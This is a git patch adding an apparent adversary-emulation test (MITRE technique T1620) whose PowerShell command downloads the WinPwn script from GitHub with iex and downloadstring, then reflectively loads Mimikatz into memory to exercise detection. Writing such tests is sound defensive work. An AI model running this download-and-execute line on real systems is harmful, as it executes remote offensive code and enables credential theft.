From e7d9f8515954e6ff4e726ba2facd80c9c8c4fe50 Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 17:44:05 -0500
Subject: [PATCH] T1620 - Reflective Code Loading (#1959)

* Create T1620.yaml

* Update T1620.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1620/T1620.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 atomics/T1620/T1620.yaml

diff --git a/atomics/T1620/T1620.yaml b/atomics/T1620/T1620.yaml
new file mode 100644
index 00000000..40c7d3f6
--- /dev/null
+++ b/atomics/T1620/T1620.yaml
@@ -0,0 +1,13 @@
+attack_technique: T1620
+display_name: "Reflective Code Loading"
+atomic_tests:
+- name: WinPwn - Reflectively load Mimik@tz into memory
+  description: Reflectively load Mimik@tz into memory technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      mimiload -consoleoutput -noninteractive
+    name: powershell